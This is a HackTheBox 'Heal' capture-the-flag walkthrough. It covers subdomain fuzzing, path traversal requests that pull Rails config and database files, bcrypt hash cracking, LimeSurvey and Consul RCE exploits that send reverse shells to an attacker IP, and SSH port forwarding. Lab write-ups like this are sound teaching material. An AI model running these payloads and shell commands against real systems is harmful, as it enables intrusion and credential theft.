HackTheBox: Heal
1. Reconnaissance & Vhost Enumeration
Initial scanning revealed standard web ports. To uncover hidden infrastructure, we fuzzed virtual hosts using gobuster.
gobuster vhost -u http://heal.htb -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt --append-domain -t 50
Discovery: api.heal.htb
Tech Stack: Rails 7.1.4, Ruby 3.3.5
Interacting with the application led to a survey endpoint, revealing another subdomain: take-survey.heal.htb. Directory brute-forcing on this new subdomain uncovered an administrative login panel.
gobuster dir -u http://take-survey.heal.htb/ -w /usr/share/wordlists/dirb/common.txt
# Discovered: /admin -> /index.php/admin/authentication/sa/login
2. Path Disclosure & Database Extraction
Back on the main application, a PDF export function exhibited suspicious behavior. After generating a PDF, the application initiated a GET request to retrieve the file via a filename parameter.
GET /download?filename=export_123.pdf HTTP/1.1
Knowing the application runs Ruby on Rails, we targeted configuration files (config/database.yml) via a path traversal attack.
GET /download?filename=../../../config/database.yml HTTP/1.1
Extracted Configuration:
test:
database: storage/test.sqlite3
production:
database: storage/development.sqlite3
Using the traversal vulnerability again, we downloaded the SQLite database:
GET /download?filename=../../storage/development.sqlite3 HTTP/1.1
Analyzing the database yielded a bcrypt password hash for the user ralph.
hashcat -m 3200 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --show
Result: Cracked password: [REDACTED]
3. LimeSurvey Exploitation (Initial Access)
We authenticated to the take-survey.heal.htb administrative portal (/admin) using the credentials: ralph / [REDACTED].
The application was identified as LimeSurvey, vulnerable to CVE-2021-44967 (Authenticated RCE via plugin upload). Using a public exploit script, we established a reverse shell.
python limesurvey_rce.py -t http://take-survey.heal.htb/index.php/admin/authentication/sa/login -u ralph -p '[REDACTED]' --listen-ip <ATTACKER_IP> --listen-port 9001
Result: Shell as www-data.
4. Lateral Movement
Enumerating the filesystem, /etc/passwd revealed an interactive user named ron. Investigating the LimeSurvey web root (/var/www/limesurvey/application/config/config.php) exposed PostgreSQL database credentials:
'username' => 'db_user',
'password' => '[REDACTED]'
Due to credential reuse, the database password also granted SSH access for the user ron.
ssh ron@heal.htb
# Password: [REDACTED]
Result: Shell as ron. User flag secured.
5. Privilege Escalation
Checking internal listening ports on the host machine:
ron@heal:~$ ss -tulnp
...
tcp LISTEN 127.0.0.1:8500
...
Port 8500/tcp corresponds to HashiCorp Consul. We utilized SSH local port forwarding to access the Consul API from our attacker machine.
ssh -L 8500:127.0.0.1:8500 ron@heal.htb
The running version of Consul was vulnerable to an authenticated RCE (Exploit-DB 51117). We executed the exploit against our forwarded port:
nc -nvlp 4444
python shell.py 127.0.0.1 8500 <ATTACKER_IP> 4444
Result: root shell obtained. The root flag is located at /root/root.txt ([REDACTED]).